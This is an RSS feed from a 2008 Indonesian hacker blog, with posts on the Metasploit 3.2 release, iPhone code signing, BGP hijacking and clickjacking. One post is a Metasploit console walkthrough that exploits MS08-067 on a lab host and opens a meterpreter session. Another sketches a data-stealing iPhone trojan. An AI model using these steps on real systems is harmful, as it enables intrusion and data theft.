<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kecoak Elektronik Indonesia</title>
	<atom:link href="http://www.kecoak-elektronik.net/log/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.kecoak-elektronik.net/log</link>
	<description>Defending Classical Hacker Mind since 1995</description>
	<pubDate>Thu, 20 Nov 2008 15:34:30 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.3</generator>
	<language>en</language>
			<item>
		<title>Metasploit 3.2 is released</title>
		<link>http://www.kecoak-elektronik.net/log/2008/11/20/metasploit-32-is-released/</link>
		<comments>http://www.kecoak-elektronik.net/log/2008/11/20/metasploit-32-is-released/#comments</comments>
		<pubDate>Thu, 20 Nov 2008 15:34:30 +0000</pubDate>
		<dc:creator>staff</dc:creator>
		
		<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=175</guid>
		<description><![CDATA[888                           888        d8b888
888                           888        Y8P888
888                           888         [...]]]></description>
			<content:encoded><![CDATA[<p>888                           888        d8b888<br />
888                           888        Y8P888<br />
888                           888           888<br />
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888<br />
888 &#8220;888 &#8220;88bd8P  Y8b888       &#8220;88b88K     888 &#8220;88b888d88&#8243;&#8221;88b888888<br />
888  888  88888888888888   .d888888&#8243;Y8888b.888  888888888  888888888<br />
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.<br />
888  888  888 &#8220;Y8888  &#8221;Y888&#8243;Y888888 88888P&#8217;88888P&#8221; 888 &#8220;Y88P&#8221; 888 &#8220;Y888<br />
888<br />
888<br />
888</p>
<p>Contact: H D Moore                              FOR IMMEDIATE RELEASE<br />
Email: hdm[at]<a href="http://metasploit.com/" target="_blank">metasploit.com</a></p>
<p>Austin, Texas, November 19th, 2008 &#8212; The Metasploit Project<br />
announced today the free, world-wide availability of version 3.2 of<br />
their exploit development and attack framework. The latest version<br />
is provided under a true open source software license (BSD) and is<br />
backed by a community-based development team.</p>
<p>Metasploit runs on all modern operating systems, including Linux,<br />
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used<br />
on a wide range of hardware platforms, from massive Unix mainframes to<br />
the iPhone. Users can access Metasploit using the tab-completing console<br />
interface, the Gtk GUI, the command line scripting interface, or the<br />
AJAX-enabled web interface. The Windows version of Metasploit includes<br />
all software dependencies and a selection of useful networking tools.</p>
<p>The latest version of the Metasploit Framework, as well as screen<br />
shots, video demonstrations, documentation and installation<br />
instructions for many platforms, can be found online at</p>
<p>- <a href="http://metasploit.com/framework/" target="_blank">http://metasploit.com/framework/</a></p>
<p>This release includes a significant number of new features and<br />
capabilities, many of which are highlighted below.</p>
<p>Version 3.2 includes exploit modules for recent Microsoft flaws, such<br />
as MS08-041, MS08-053, MS08-059, MS08-067, MS08-068, and many more.</p>
<p>The module format has been changed in version 3.2. The new format<br />
removes the previous naming and location restrictions and paved the way<br />
to an improved module loading and caching backend. For users, this means<br />
being able to copy a module into nearly any subdirectory and be able to<br />
immediately use it without edits.</p>
<p>The Byakugan WinDBG extension developed by Pusscat has been integrated<br />
with this release, enabling exploit developers to quickly exploit new<br />
vulnerabilities using the best Win32 debugger available today.</p>
<p>The Context-Map payload encoding system development by I)ruid is now<br />
enabled in this release, allowing for any chunk of known process memory to<br />
be used as an encoding key for Windows payloads.</p>
<p>The Incognito token manipulation toolkit, written by Luke Jennings, has<br />
been integrated as a Meterpreter module. This allows an attacker to gain<br />
new privleges through token hopping. The most common use is to hijack<br />
domain admin credentials once remote system access is obtained.</p>
<p>The PcapRub, Scruby, and Packetfu libraries have all been linked into<br />
the Metasploit source tree, allowing easy packet injection and capture.</p>
<p>The METASM pure-Ruby assembler, written by Yoann Guillot and Julien<br />
Tinnes, has gone through a series of updates. The latest version has been<br />
integrated with Metasploit and now supports MIPS assembly and the ability<br />
to compile C code.</p>
<p>The Windows payload stagers have been updated to support targets with<br />
NX CPU support. These stagers now allocate a read/write/exec segment of<br />
memory for all payload downloads and execution.</p>
<p>Executables which have been generated by msfpayload or msfencode now<br />
support NX CPUs. The generated executable is now smaller and more<br />
reliable, opening the door to a wider range of uses. The psexec and<br />
smb_relay modules now use an executable template thats acts like a real<br />
Windows service, improving the reliability and cleanup requirements of<br />
these modules.</p>
<p>The Reflective DLL Injection technique pioneered by Stephen Fewer of<br />
Harmony Security has been integrated into the framework. The new payloads<br />
use the &#8220;reflectivedllinjection&#8221; stager prefix and share the same binaries<br />
as the older DLL injection method.</p>
<p>Client-side browser exploits now benefit from a set of new javascript<br />
obfuscation techniques developed by Egypt. This improvement leads to a<br />
greater degree of anti-virus bypass for client-side exploits.</p>
<p>Metasploit contains dozens of exploit modules for web browsers and<br />
third-party plugins. The new browser_autopwn module ties many of these<br />
together with advanced fingerprinting techniques to deliver more shells<br />
than most pen-testers know what to do with.</p>
<p>This release includes a set of man-in-the-middle, authentication relay,<br />
and authentication capture modules. These modules can be integrated with<br />
a fake proxy (WPAD), a malicious access point (Karmetasploit), or basic<br />
network traffic interception to gain access to client machines. These<br />
modules tie together browser_autopwn, SMB relaying, and HTTP credential<br />
and form capturing to pillage data from client systems.</p>
<p>Nearly all Metasploit modules now support IPv6 transports. IPv6 stagers<br />
exist for the Windows and Linux platforms, opening the door for penetration<br />
testing of pure IPv6 networks. The VNCInject and Meterpreter payloads have<br />
been extensively tested over IPv6 sockets.</p>
<p>Efrain Torres&#8217;s WMAP project has been merged into Metasploit. WMAP is<br />
general purpose web application scanning framework that can be automated<br />
through integration with an attack proxy (ratproxy) or be accessed as<br />
individual auxiliary modules.</p>
<p>Egypt&#8217;s new PHP payloads provide complete bind, reverse, and findsock<br />
support for PHP web application exploits. If you are sick of C99 and R57<br />
and looking to gain a &#8220;real&#8221; shell from one of the hundreds of RFI flaws<br />
listed on milw0rm, the new PHP payloads work great against multiple<br />
operating systems.</p>
<p>The db_autopwn command has been revamped to support port-based limits,<br />
regex-based module matching, and limits on the number of spawned jobs. The<br />
end result is a way to quickly launch specific modules against a specific<br />
set of target machines. These changes were suggested and implemented by<br />
Marcell &#8216;SkyOut&#8217; Dietl (Helith).</p>
<p>Enjoy the release,</p>
<p>hdm      mc     egypt<br />
pusscat  ramon   patrickw<br />
I)ruid    et   kkatterjohn</p>
<p>&#8212;&#8212;-</p>
<p>Taken from: Metasploit Mailing List</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kecoak-elektronik.net/log/2008/11/20/metasploit-32-is-released/feed/</wfw:commentRss>
		</item>
		<item>
		<title>iPhone dan Code Signing</title>
		<link>http://www.kecoak-elektronik.net/log/2008/11/10/iphone-dan-code-signing/</link>
		<comments>http://www.kecoak-elektronik.net/log/2008/11/10/iphone-dan-code-signing/#comments</comments>
		<pubDate>Mon, 10 Nov 2008 00:35:06 +0000</pubDate>
		<dc:creator>staff</dc:creator>
		
		<category><![CDATA[Apple]]></category>

		<category><![CDATA[code signing]]></category>

		<category><![CDATA[iPhone]]></category>

		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=173</guid>
		<description><![CDATA[It&#8217;s weekend! Take some tea (somehow coffee used to make me dizzy), some bread and listen to some jazzy music. My browser just took me to old interesting article regarding iPhone code signing.  Here&#8217;s my favorite quote:
With such a system in place, there’s no need for iPhone anti-virus software. Our children will never know [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">It&#8217;s weekend! Take some tea (somehow coffee used to make me dizzy), some bread and listen to some jazzy music. My browser just took me to old interesting article regarding <a href="http://www.roughlydrafted.com/2008/03/18/iphone-20-sdk-how-signing-certificates-work/" target="_blank">iPhone code signing</a>.  Here&#8217;s my favorite quote:</p>
<blockquote style="text-align: justify;"><p>With such a system in place, there’s no need for iPhone anti-virus software. Our children will never know why Symantec and Norton ever existed.</p></blockquote>
<p style="text-align: justify;">Artikel tersebut menarik karena memberikan penjelasan mengapa terdapat policy code signing pada iPhone. Code signing merupakan langkah kedua bagi para developer aplikasi iPhone setelah menyelesaikan aplikasinya dan melakukan beberapa testing menggunakan iPhone simulator. Sebelum melakukan testing pada real iPhone, maka developer diwajibkan mendapatkan provisioning profile untuk proses signing code aplikasi miliknya agar dapat berjalan pada real iPhone. Setelah aplikasi dapat berjalan dengan baik, maka sang developer dapat kembali berhubungan dengan apple untuk prosedur peletakan aplikasi miliknya di apple store. Disinilah apple akan bertindak sebagai &#8217;sang dewa&#8217; yang akan menentukan apakah suatu aplikasi dapat dimasukan pada apple store atau tidak.  Kriteria apple cukup sulit, banyak developer yang ditolak aplikasinya karena aplikasi tersebut di-indikasikan akan menjadi attack vector terhadap iPhone. Sebagai contoh, menggunakan link pada window &#8216;about&#8217; yang biasanya digunakan untuk memberikan referensi ke suatu website. Hal ini diindikasikan dapat menjadi attack vector terhadap iPhone jika ternyata pada link tersebut diletakan malicious code. Saat proses submit aplikasi ke apple, itulah saat mendebarkan apakah aplikasi kita akan diterima atau tidak. Terutama saat kita berharap aplikasi tersebut akan di bandrol dengan harga tertentu.</p>
<p style="text-align: justify;">Kenapa harus begitu sulit?! alasannya dapat ditemukan pada artikel diatas.  Jika kita lihat pada <a href="http://www.pixar.com/theater/trailers/walle/index.html" target="_blank">Wall-e</a> seluruh umat manusia dapat dikontrol dengan baik melalui sistem yang telah disiapkan, semua dipaksa mengikuti aturan untuk kebaikan mereka sendiri namun sepertinya tidak demikian dengan kehidupan manusia yang sebenarnya. Walaupun apple telah memberikan sistem yang telah dipersiapkan dengan baik, dan memaksa semua pengguna untuk mengikuti aturan yang telah disediakan dengan tujuan melindungi end-user dari berbagai attack vector, namun kehadiran para hacker dengan penyakit rasa ingin tahunya yang tinggi membuat sistem tersebut di rusak hanya dalam hitungan bulan sejak rilis awalnya.</p>
<p style="text-align: justify;"><a href="http://conference.hackinthebox.org/hitbsecconf2008kl/materials/D2T1%20-%20Charlie%20Miller%20-%20iPwning%20the%20iPhone.pdf" target="_blank">Charlie Miller</a> menunjukan proses awal pencarian bugs aplikasi iPhone, hal ini dilakukan dengan memanfaatkan &#8216;jailbroken iPhone&#8217;. Salah satu hasilnya adalah bugs mobile safari yang dimanfaatkan sebagai metode jailbreak firmware awal iPhone. Pada presentasi tersebut Charlie Miller juga sekaligus menunjukan metode untuk bypass code signing pada aplikasi iPhone, walaupun tidak banyak yang menyadari efek keberhasilan menjalankan aplikasi C secara bebas pada suatu platform (shellcode development, low-level debugging, backdoor development, dll).</p>
<p style="text-align: justify;">Bagi para creative evil thinker sebetulnya tidak harus menunggu ditemukan bugs pada aplikasi iPhone, cukup dengan memanfaatkan para pengguna hasil karya saurik dimana aplikasi-aplikasi iPhone dari un-official 3rd party dapat di-install dengan mudah melalui Cydia maka seharusnya sangat mudah membuat trojan ala iPhone, yang seakan-akan memberikan aplikasi lucu nan menarik namun ternyata menjelajah isi iPhone serta mengirimkan berbagai macam informasi didalamnya (contact, notes, sms, photo, dll).</p>
<p>Jadi, anak dan cucu kita masih tetap akan mengenal symantec sebagai produsen anti-virus / anti-trojan, bukan begitu?!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kecoak-elektronik.net/log/2008/11/10/iphone-dan-code-signing/feed/</wfw:commentRss>
		</item>
		<item>
		<title>MS08-067</title>
		<link>http://www.kecoak-elektronik.net/log/2008/10/31/ms08-067/</link>
		<comments>http://www.kecoak-elektronik.net/log/2008/10/31/ms08-067/#comments</comments>
		<pubDate>Thu, 30 Oct 2008 18:51:54 +0000</pubDate>
		<dc:creator>staff</dc:creator>
		
		<category><![CDATA[Eksploit]]></category>

		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=169</guid>
		<description><![CDATA[msf &#62; version
Framework: 3.2-testing.5773
Console  : 3.2-testing.5773
msf &#62; use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) &#62; show options
Module options:
Name     Current Setting  Required  Description
&#8212;-     &#8212;&#8212;&#8212;&#8212;&#8212;  &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
msf exploit(ms08_067_netapi) &#62; info windows/smb/ms08_067_netapi
Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: [...]]]></description>
			<content:encoded><![CDATA[<p>msf &gt; version<br />
Framework: 3.2-testing.5773<br />
Console  : 3.2-testing.5773</p>
<p>msf &gt; use windows/smb/ms08_067_netapi<br />
msf exploit(ms08_067_netapi) &gt; show options</p>
<p>Module options:</p>
<p>Name     Current Setting  Required  Description<br />
&#8212;-     &#8212;&#8212;&#8212;&#8212;&#8212;  &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;<br />
RHOST                     yes       The target address<br />
RPORT    445              yes       Set the SMB service port<br />
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</p>
<p>msf exploit(ms08_067_netapi) &gt; info windows/smb/ms08_067_netapi</p>
<p>Name: Microsoft Server Service Relative Path Stack Corruption<br />
Version: 5803<br />
Platform: Windows<br />
Privileged: Yes<br />
License: Metasploit Framework License (BSD)</p>
<p>Provided by:<br />
hdm &lt;hdm@metasploit.com&gt;</p>
<p>Available targets:<br />
Id  Name<br />
&#8211;  &#8212;-<br />
0   Windows XP SP2 English (DEP)<br />
1   Windows XP SP3 English (DEP)<br />
2   Windows 2003 SP0 English (NO DEP)<br />
3   Windows 2003 SP2 English (NO DEP)</p>
<p>Basic options:<br />
Name     Current Setting  Required  Description<br />
&#8212;-     &#8212;&#8212;&#8212;&#8212;&#8212;  &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;<br />
RHOST                     yes       The target address<br />
RPORT    445              yes       Set the SMB service port<br />
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</p>
<p>Payload information:<br />
Space: 400<br />
Avoid: 7 characters</p>
<p>Description:<br />
This module exploits a parsing flaw in the path canonicalization<br />
code of NetAPI32.dll through the Server Service. This module is<br />
capable of bypassing DEP on some operating systems and service<br />
packs. The correct target must be used to prevent the Server Service<br />
(along with a dozen others in the same process) from crashing.<br />
Windows XP targets seem to handle multiple successful exploitation<br />
events, but 2003 targets will often crash or hang on subsequent<br />
attempts. This is just the first version of this module, full<br />
support for DEP bypass on 2003, along with other platforms, is still<br />
in development.</p>
<p>References:<br />
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250<br />
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx</p>
<p>msf exploit(ms08_067_netapi) &gt; set RHOST 192.168.132.130<br />
RHOST =&gt; 192.168.132.130</p>
<p>msf exploit(ms08_067_netapi) &gt; set PAYLOAD windows/meterpreter/bind_tcp<br />
PAYLOAD =&gt; windows/meterpreter/bind_tcp</p>
<p>msf exploit(ms08_067_netapi) &gt; set TARGET 0<br />
TARGET =&gt; 0<br />
msf exploit(ms08_067_netapi) &gt; exploit<br />
[*] Started bind handler<br />
[*] Connecting to the target&#8230;<br />
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] &#8230;<br />
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] &#8230;<br />
[*] Triggering the vulnerability&#8230;<br />
[*] Transmitting intermediate stager for over-sized stage&#8230;(191 bytes)<br />
[*] Sending stage (2650 bytes)<br />
[*] Sleeping before handling stage&#8230;<br />
[*] Uploading DLL (73227 bytes)&#8230;<br />
[*] Upload completed.<br />
[*] Meterpreter session 1 opened (192.168.132.1:51707 -&gt; 192.168.132.130:4444)</p>
<p>meterpreter &gt; sysinfo<br />
Computer: Research-1<br />
OS      : Windows XP (Build 2600, Service Pack 2).</p>
<p>Lagi-lagi netbios menjadi pintu masuk Microsoft Windows. Mungkin sudah saatnya pemberi <a href="http://forum.detikinet.com/showthread.php?t=21880" target="_blank">tutorial</a> melupakan RPC DCOM holes untuk contoh menembus Microsoft Windows via Metasploit.</p>
<p>I think everyone love 2008&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kecoak-elektronik.net/log/2008/10/31/ms08-067/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Interpid !</title>
		<link>http://www.kecoak-elektronik.net/log/2008/10/30/interpid/</link>
		<comments>http://www.kecoak-elektronik.net/log/2008/10/30/interpid/#comments</comments>
		<pubDate>Thu, 30 Oct 2008 16:17:38 +0000</pubDate>
		<dc:creator>Sp1d3r-73</dc:creator>
		
		<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=164</guid>
		<description><![CDATA[Mark Shuttleworth bersama team-nya, hari ini resmi merilis versi terbaru dari Ubuntu yang bertajuk &#8220;Interpid Ibex&#8221;. Tidak banyak perubahan dari versi sebelumnya, malahan banyak ubuntu user yang tidak mau meng-upgrade ubuntunya, hal ini dikarenakan di versi sebelumnya mendukung Long Time Support. Namun, tidak ada salahnya jika anda ingin mencoba varian ubuntu terbaru ini. To download [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Mark Shuttleworth bersama team-nya, hari ini resmi merilis versi terbaru dari <a href="http://www.ubuntu.com/">Ubuntu</a> yang bertajuk <a href="http://wiki.ubuntu.com/InterpidIbex">&#8220;Interpid Ibex&#8221;</a>. Tidak banyak perubahan dari <a href="http://wiki.ubuntu.com/HardyHeron">versi sebelumnya</a>, malahan banyak ubuntu user yang tidak mau meng-upgrade ubuntunya, hal ini dikarenakan di versi sebelumnya mendukung <a href="http://wiki.ubuntu.com/LTS">Long Time Support</a>. Namun, tidak ada salahnya jika anda ingin mencoba varian ubuntu terbaru ini. To download this version, visit <a href="http://www.ubuntu.com/getubuntu">here</a>. To see the feature of this version, visit <a href="http://lifehacker.com/5058730/first-look-at-ubuntu-810-intrepid-ibex-beta">here</a> or <a href="http://www.ubuntu.com/news/ubuntu-8.10-desktop">here.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kecoak-elektronik.net/log/2008/10/30/interpid/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Another Internet Core Bugs</title>
		<link>http://www.kecoak-elektronik.net/log/2008/10/20/another-internet-core-bugs/</link>
		<comments>http://www.kecoak-elektronik.net/log/2008/10/20/another-internet-core-bugs/#comments</comments>
		<pubDate>Sun, 19 Oct 2008 22:49:45 +0000</pubDate>
		<dc:creator>staff</dc:creator>
		
		<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=162</guid>
		<description><![CDATA[1. Pakistan bermaksud mem-block salah satu content video pada youtube yang dinilai mendiskreditkan islam
2. Pakistan melalui salah satu ISP terbesar-nya melakukan proses blocking dengan memanfaatkan kapasitas ISP tersebut untuk memainkan proses routing protokol BGP agar request dari rakyat pakistan ke youtube.com diarahkan kembali kedalam network pakistan
3. (Agar tidak perlu bersusah payah &#124;&#124; kesalahan engineer ISP [...]]]></description>
			<content:encoded><![CDATA[<p>1. Pakistan bermaksud mem-block salah satu content video pada youtube yang dinilai mendiskreditkan islam</p>
<p>2. Pakistan melalui salah satu ISP terbesar-nya melakukan proses blocking dengan memanfaatkan kapasitas ISP tersebut untuk memainkan proses routing protokol BGP agar request dari rakyat pakistan ke youtube.com diarahkan kembali kedalam network pakistan</p>
<p>3. (Agar tidak perlu bersusah payah || kesalahan engineer ISP || sang engineer memahami protokol BGP dengan baik yang akan memberikan efek pada AS router ISP lain) berhasil memblock request dari rakyat pakistan yang hendak meng-akses situs youtube. Bagaimana caranya? Cukup memberikan advertisement via router BGP untuk youtube.com terhadap AS disekitarnya yang menyatakan &#8216;apabila ada request ke youtube.com harap diarahkan kepada kami&#8217;, secara teknikal ini dapat dilakukan dengan memberikan advertisement berupa &#8216;prefixes&#8217; yang lebih kecil untuk routing menuju youtube.com</p>
<p>4. Selang beberapa saat setelah itu, akses ke youtube.com outage selama 2 jam. <a href="http://www.ripe.net/news/study-youtube-hijacking.html" target="_self">Hasil investigasi</a> menyatakan paket data dari tempat-tempat diberbagai belahan dunia &#8216;blackout&#8217; di network pakistan.</p>
<p>5. Insiden ini mebuahkan investigasi dan pada akhirnya public-disclosure secara meluas (yang semula hanya diketahui beberapa pihak) mengenai bugs pada protokol BGP. Tingkah laku BGP ini telah menjadi hasil riset berbagai pihak sejak awal-awal kemunculannya termasuk close-disclosure yang dilakukan oleh old-skewl hacker kepada pihak inteligent mengenai bagaimana memanfaatkan bugs ini untuk mengawasi trafik internet dunia 10 tahun yang lalu.</p>
<p>6. Berbeda dengan bugs DNS dimana proses mass-patch dapat dilakukan, untuk masalah ini jauh lebih sulit untuk melakukan patch, dan mungkin baru akan benar-benar aman setelah berbulan-bulan / tahunan. Setiap pihak yang memiliki akses ke BGP router dapat melakukan man-in-the-middle attack ini. Jika traffic bisa diarahkan untuk eavesdropping, mungkin donk untuk melakukan dos?</p>
<p>7. Beberapa sumber juga menyatakan home router yang memiliki kemampuan BGP juga dapat dimanfaatkan untuk melakukan abuse.</p>
<p>8. Banyak group-group underground Indonesia yang mampu mendapatkan akses suatu router ISP, dan sudah hal klasik router ISP tersebut menjadi mainan anak-anak. Mungkin dengan adanya public disclosure seperti ini, kalangan underground bisa membantu pemerintah menerapkan RUU Anti Pornografi secara langsung dan teknikal tanpa perlu tetek bengek rapat-rapat berbau politik dan menghasilkan UUD (Ujung-Ujungnya Duid).</p>
<p>9. Please don&#8217;t take seriously point #8 above. Tentu saja pemerintah memiliki kemampuan jika memang ada kemauan untuk melakukan blocking terhadap situs-situs pornografi. Terutama dengan adanya proses <a href="http://www.mgl.bmp.net.id/Yahoo_Paling_Diincar_di_Indonesia,38.html" target="_blank">monitoring</a> dari ID-SIRTII tercinta (small and easy step from monitoring to blocking, isn&#8217;t it?).</p>
<p>Sumber: <a href="http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html" target="_blank">http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kecoak-elektronik.net/log/2008/10/20/another-internet-core-bugs/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Dan Kaminsky&#8217;s hype fans</title>
		<link>http://www.kecoak-elektronik.net/log/2008/10/06/dan-kaminskys-hype-fans/</link>
		<comments>http://www.kecoak-elektronik.net/log/2008/10/06/dan-kaminskys-hype-fans/#comments</comments>
		<pubDate>Mon, 06 Oct 2008 10:39:19 +0000</pubDate>
		<dc:creator>staff</dc:creator>
		
		<category><![CDATA[News]]></category>

		<category><![CDATA[Web Browser]]></category>

		<category><![CDATA[Websecurity]]></category>

		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=157</guid>
		<description><![CDATA[Masih ingat dengan full-disclosure media hype Month Of Browser Bugs yang dimotori oleh HDM bulan juli 2006?!beberapa bulan setelah itu para fans full-disclosure media hype ikut-ikut an metode HDM dan menyelenggarakan &#8216;Month Of Something Bugs&#8217; mereka masing-masing. Ada yang apple lah, ada yang kernel, dll.
Tahun 2008 sepertinya masa keemasan metode &#8216;partial-disclosure media hype&#8217; oleh para [...]]]></description>
			<content:encoded><![CDATA[<p>Masih ingat dengan full-disclosure media hype Month Of Browser Bugs yang dimotori oleh HDM bulan juli 2006?!beberapa bulan setelah itu para fans full-disclosure media hype ikut-ikut an metode HDM dan menyelenggarakan &#8216;Month Of Something Bugs&#8217; mereka masing-masing. Ada yang apple lah, ada yang kernel, dll.</p>
<p>Tahun 2008 sepertinya masa keemasan metode &#8216;partial-disclosure media hype&#8217; oleh para researcher security, khususnya yang berasal dari USA. Dan kali ini mengikuti metode Dan Kaminsky, menunda full-disclosure dengan terlebih dahulu melakukan partial-disclosure yang memanfaatkan media hype. Hasilnya?! sebagian membuat masyarakat penasaran dan sebagian lain membuat masyarakat ketakutan karena tipe bugs-nya masih misterius.</p>
<p>Trik bisnis kah?! atau trik popularitas?! Don&#8217;t care. Yang pasti, tipe bugs-nya termasuk menarik untuk dibahas.</p>
<p>Dua jenis bugs yang mengikuti metode partial-disclsoure media hype Dan Kaminsky, dan keduanya sedang hangat dibahas saat ini. Yang pertama datang dari bidang webhacking, dan yang kedua datang dari bidang system hacking. Dan seperti biasa, keduanya ikut disulut dari salah satu mailing list tempat para researcher-researcher cerdas di bidang security berkumpul, Daily Dave mailing list.</p>
<p>Isu pertama datang dari kawasan webhacking mengenai &#8220;clickjacking&#8221;. Jeremiah Grossman dan Rsnake menunda full-disclosure mereka tentang clickjacking pada event OWASP &#8216;08 dan menggantinya dengan sesi &#8216;ClickJacking 20-Questions&#8217;. Hal ini membuat masyarakat kembali dalam status &#8217;spekulasi&#8217; mengenai bugs tersebut, karena Jeremiah dan Rsnake hanya memberikan penjelasan singkat tentang bugs tersebut. Hal ini mirip ketika Dan Kaminsky melakukan partial disclosure terhadap masyarakat dengan bugs DNS cache nya. Banyak pihak membicarakan mengenai clickjacking ini, diantaranya <a href="http://hackademix.net/2008/09/27/clickjacking-and-noscript/" target="_blank">Giorgio Maone</a>, <a href="http://lists.immunitysec.com/pipermail/dailydave/2008-September/005356.html" target="_blank">Dave Aitel</a>, hingga <a href="http://www.breakingpointsystems.com/community/blog/clickjacking">BeakingPoint Labs</a>. Kita juga dapat melihat salah satu <a href="http://www.planb-security.net/notclickjacking/iframetrick.html" target="_blank">contoh spekulasi</a> tersebut. <a href="http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-September/016284.html" target="_blank">Michal Zalewski</a> juga ikut menjelaskan mengenai kemungkinan bugs ini serta memberikan solusi atas permasalahan tersebut. Media hyped semakin ramai dengan salah satu isi <a href="http://blogs.adobe.com/psirt/2008/09/thanks_to_jeremiah_grossman_an.html" target="_blank">blog adobe</a> mengenai clickjacking yang juga memberikan efek pada produk adobe.</p>
<p>Diantara semua, email penjelasan dari Michal Zalewski termasuk yang membuat media semakin heboh. Terutama karena salah satu solusi yang di-propose oleh dia untuk menangani masalah ini adalah &#8216;Rework everything we know about HTML / browser security models&#8217;. Well, at least semua researcher tersebut setuju bahwa kombinasi Mozilla Firefox + NoScript dapat mencegah user terkena efek serangan tersebut. Tapi seperti biasa, bugs ini rasanya tetap menarik untuk diikuti terutama jika mempengaruhi produk selain web browser.</p>
<p>Kandidat kedua untuk fans Dan&#8217;s Kaminksy partial-disclosure scenario adalah <a href="http://insecure.org/stf/tcp-dos-attack-explained.html" target="_blank">&#8220;New TCP Resource Exhaustion DOS (Denial of Service) Attack&#8221;</a>. Fyodor (Nmap creator) baru saja hari ini menulis pada (again) mailing list Daily Dave mengenai spekulasinya terhadap jenis serangan Dos yang dikatakan &#8216;baru&#8217; oleh Robert Lee dan Jack Louis. Berdasarkan keterangan Fyodor, basic jenis serangan tersebut sama sekali bukan jenis baru karena dia sudah meng-implementasikan nya pada tools Ndos beberapa tahun yang lalu namun tidak merilis tools tersebut, hanya menuliskan pada salah satu buku yang (bagian fyodor) juga di-buat free untuk dibaca secara online. I love fyodor ;).</p>
<p>Inti dari &#8216;New&#8217; Dos tersebut terletak pada TCP Resource Exhaustion. Silahkan baca dengan cermat penjelasan Fyodor. Pada penjelasan tersebut kita dapat melihat bagaimana resource suatu sistem yang menggunakan protokol TCP/IP dapat dihabiskan. Sistem akan mengalokasikan beberapa resource-nya untuk menangani protokol TCP/IP dan penjelasan Fyodor diatas memperlihatkan bagaimana caranya menghabiskan resource tersebut secara cerdik.</p>
<p>Spekulasi tetaplah spekulasi, bisa jadi benar seperti yang terjadi pada bugs dns dan kaminsky, bisa jadi sebagian benar dalam arti memiliki pondasi yang mirip dengan spekulasi-spekulasi tersebut namun &#8217;sang penemu&#8217; memiliki cara lain untuk meng-extend bugs tersebut, bisa jadi completely false! Dalam arti, spekulasi orang-orang diseluruh dunia salah dan sang penemu merupakan orang jenius yang mampu menemukan bugs tersebut sendirian tanpa bisa disamai oleh researcher manapun.</p>
<p>Setelah membaca penjelasan Fyodor mengenai tehnik Ndos, mungkin ada yang bersedia menghabiskan waktunya untuk develop tools tersebut?! mungkin bisa menjadi alternative lain selain menggunakan mekanisme tembak.c secara distribusi :).</p>
<p>As always, media hype security circus is interesting. Hm, break time is over (sambil makan buah terakhir), put back my butt to daily job..</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kecoak-elektronik.net/log/2008/10/06/dan-kaminskys-hype-fans/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Handheld anti sadap KPK</title>
		<link>http://www.kecoak-elektronik.net/log/2008/10/05/handheld-anti-sadap-kpk/</link>
		<comments>http://www.kecoak-elektronik.net/log/2008/10/05/handheld-anti-sadap-kpk/#comments</comments>
		<pubDate>Sun, 05 Oct 2008 04:28:47 +0000</pubDate>
		<dc:creator>staff</dc:creator>
		
		<category><![CDATA[Encryption]]></category>

		<category><![CDATA[Telco]]></category>

		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=154</guid>
		<description><![CDATA[Cukup untuk membuat kita tertawa membaca berita tersebut. Bapak direktur marketing ini memang sangat cerdas dan sangat memahami customer dengan baik, dengan memperhatikan pangsa pasar dimana para koruptor berkeliaran dan memahami kekuatiran mereka pasca korban kasus BLBI yang di-busted dengan metode cracking (baca: sadap) oleh pemerintah, kehadiran suatu produk yang dapat mengamankan privasi para potensial [...]]]></description>
